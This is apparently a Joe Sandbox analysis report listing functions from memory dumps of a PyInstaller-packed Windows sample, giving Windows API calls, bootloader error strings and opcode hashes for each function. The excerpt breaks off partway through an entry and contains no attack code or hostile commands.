                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: -$:$f$p$p
                                                                                                                                                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                    • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                    • Instruction ID: af3f2916eab9aafb0fe3373c4df90f5f9c00b436f1e23828c0880fae189e5125
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0129461E0A24386FB667E1CD1442BBB661EB6A750FC44139D789465ECFFBCE580CB20
                                                                                                                                                                                                                                    Function 00007FF7B2B70FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: f$f$p$p$f
                                                                                                                                                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                    • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                    • Instruction ID: 22e67fd42674f0cccf0046000ddafa029f34ea604b410958f3ab441c39dc7805
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6126161E2E14385FB257E1C905467BA6A1FB62750FD88035D79A469ECEFBCE480CB30
                                                                                                                                                                                                                                    Function 00007FF7B2B61050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                    • Opcode ID: b8dd22586ecb9ec25ce4dcc18a824cece727d2e3c9969636290545a732f9d63d
                                                                                                                                                                                                                                    • Instruction ID: 445a8fa38f2869c8095a6fc2133a46372657e1fb45ad5f4d2ee38170357cd616
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8dd22586ecb9ec25ce4dcc18a824cece727d2e3c9969636290545a732f9d63d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0417321A1A55281EA17FB1998046BBF3A0BF66B84FC44431EF0C8779DEEBCE541C754
                                                                                                                                                                                                                                    Function 00007FF7B2B61470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                    • Opcode ID: e377107dd91a525341321e5f01f657afb5ae6cbec7bbf7b76d68f7e19a70bd25
                                                                                                                                                                                                                                    • Instruction ID: 545ad54409c11d86934cdfeac539d5fe36c7bb2226d6b1f0a2750ebc3f9fd2a9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e377107dd91a525341321e5f01f657afb5ae6cbec7bbf7b76d68f7e19a70bd25
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2416121A1A54285EA13FB2994005BBF390AF66794FC44436EF4D87B9EEEBCE501C724
                                                                                                                                                                                                                                    Function 00007FF7B2B6EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                                    • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                    • Instruction ID: 23daf4a7cd6240d1c1b03808ed336db263f652e9377165b83e0f2c1598caad09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57D1C22290974286EB22AF6994807AEF7A0FB66788F440135DF4D9779DEF78E042C714
                                                                                                                                                                                                                                    Function 00007FF7B2B62C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62C9E
                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62D63
                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF7B2B62D99
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                    • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                    • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                    • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                    • Instruction ID: dbe2e5dddbff3a4d54fc918a9b037df6f06ce0f6b101bdbb2b1c8e9d67e548f6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A31F822709A4142F622BB29A8142ABF691BF99788F800136EF4DD775DFF7CD506C710
                                                                                                                                                                                                                                    Function 00007FF7B2B6DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD4D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD5B
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD85
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DDF3
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DDFF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                    • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                    • Instruction ID: 54afd11ce53b674d5d73d884eed212910d6a18f819cd1efb76245513016dc380
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6331D321B1B60281EE13BB1A9400676E394FF27BA4F990535DF1D8A398FEBCE040D324
                                                                                                                                                                                                                                    Function 00007FF7B2B66360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                    • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                    • Instruction ID: 73ec254de23d850c5025af6fad3383a3b7f3c8320976cccf0b7bec119941a8e9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A941B321A1AA8691EA17EB28E4181EBE311FF66340FC00136DB5C8769DFFBCE515C360
                                                                                                                                                                                                                                    Function 00007FF7B2B62A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7B2B6351A,?,00000000,00007FF7B2B63F23), ref: 00007FF7B2B62AA0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                    • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                    • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                    • Instruction ID: af8f5270a3ab3a0a3036792c9bee97f3e703a4e496ffdebd4539f8ee686ade3c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5221B13261A78182E622AB29B8417E7F294FB99384F800136EF8C9375DEFBCD145C750
                                                                                                                                                                                                                                    Function 00007FF7B2B7B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                    • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                    • Instruction ID: b7df2a62a2aaea6be40c9e0cf40f393490a7c80dc4d355fcf58d23aee2dace7c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9021AF20A0F24281F65B776D555113BD2425F767B0F904634DB3E46BEEFDACA481CB20
                                                                                                                                                                                                                                    Function 00007FF7B2B87D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                    • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                    • Instruction ID: 614847d7d1537a0ea4eb4ee3cb15e8dcac57bbd8e028964497da16c8bb366705
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B11DA21719A4182E751AB1AE84833AF6A0FB99FE4F540234DB5D8B7ACEFBCD440C710
                                                                                                                                                                                                                                    Function 00007FF7B2B68ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68EFD
                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68F5A
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68FE5
                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69044
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69055
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B6906A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3462794448-0
                                                                                                                                                                                                                                    • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                    • Instruction ID: a98cf290ef694c4207205ea9c9f60dbf5f0e35ac7a1d52a7dd059e6231f6c00c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0441A861A1AA8181EA32BB1AA5442BBF394FB96BC4F840135DF4D9778DEEBCD500C714
                                                                                                                                                                                                                                    Function 00007FF7B2B7B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B2D7
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B30D
